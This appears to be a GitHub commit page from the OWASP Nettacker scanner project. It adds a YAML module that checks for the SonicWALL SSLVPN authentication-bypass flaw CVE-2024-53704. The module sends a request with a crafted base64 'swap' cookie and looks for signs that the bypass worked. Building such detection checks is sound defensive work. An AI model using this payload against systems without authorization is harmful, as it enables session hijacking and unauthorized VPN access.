Skip to content

Commit 626a765

Browse files
authored
adding SonicWALL SSLVPN CVE-2024-53704 module (#1018)
* Update paloalto_panos_cve_2025_0108.yaml added cisa_kev Adding cisa_kev profile to the module: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has just added this CVE-2025-0108 impacting Palo Alto Networks PAN-OS to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. * adding sonicwall_sslvpn_cve_2024_53704_vuln module
1 parent 2456cd1 commit 626a765

File tree

2 files changed

+59
-0
lines changed

2 files changed

+59
-0
lines changed

docs/Modules.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -153,6 +153,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
153153
* '**ProFTPd_memory_leak_vuln**' - check ProFTPd for CVE-2001-0136
154154
* '**ProFTPd_restriction_bypass_vuln**' - check ProFTPd for CVE-2009-3639
155155
* '**server_version_vuln**' - check if the web server is leaking server banner in 'Server' response header
156+
* '**sonicwall_sslvpn_cve_2024_53704_vuln**' - check the target for SonicWALL SSLVPN CVE-2024-53704 vulnerability
156157
* '**ssl_signed_certificate_vuln**' - check for self-signed & other signing issues(weak signing algorithm) in SSL certificate
157158
* '**ssl_expired_certificate_vuln**' - check if SSL certificate has expired or is close to expiring
158159
* '**ssl_version_vuln**' - check if the server's SSL configuration supports old and insecure SSL versions
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
info:
2+
name: sonicwall_sslvpn_cve_2024_53704_vuln
3+
author: OWASP Nettacker team
4+
severity: 8.2
5+
description: CVE-2024-53704 Is an Improper Authentication vulnerability in the SonicWALL SSLVPN authentication mechanism which allows a remote attacker to bypass authentication.
6+
reference:
7+
- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003
8+
- https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking
9+
- https://www.cisa.gov/news-events/alerts/2025/02/18/cisa-adds-two-known-exploited-vulnerabilities-catalog
10+
profiles:
11+
- vuln
12+
- vulnerability
13+
- http
14+
- high_severity
15+
- cve
16+
- sonicwall
17+
- cisa_kev
18+
19+
20+
payloads:
21+
- library: http
22+
steps:
23+
- method: get
24+
timeout: 3
25+
headers:
26+
Host: "{target}"
27+
User-Agent: "{user_agent}"
28+
Cookie: 'swap=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='
29+
allow_redirects: false
30+
ssl: false
31+
url:
32+
nettacker_fuzzer:
33+
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
34+
prefix: ""
35+
suffix: ""
36+
interceptors:
37+
data:
38+
paths:
39+
- "cgi-bin/sslvpnclient?launchplatform="
40+
schema:
41+
- "https"
42+
ports:
43+
- 443
44+
- 4433
45+
- 4443
46+
response:
47+
condition_type: and
48+
conditions:
49+
status_code:
50+
regex: "200"
51+
reverse: false
52+
header:
53+
Server:
54+
regex: 'SonicWALL SSLVPN Web Server'
55+
reverse: false
56+
content:
57+
regex: 'NELaunchX1'
58+
reverse: false

0 commit comments

Comments
 (0)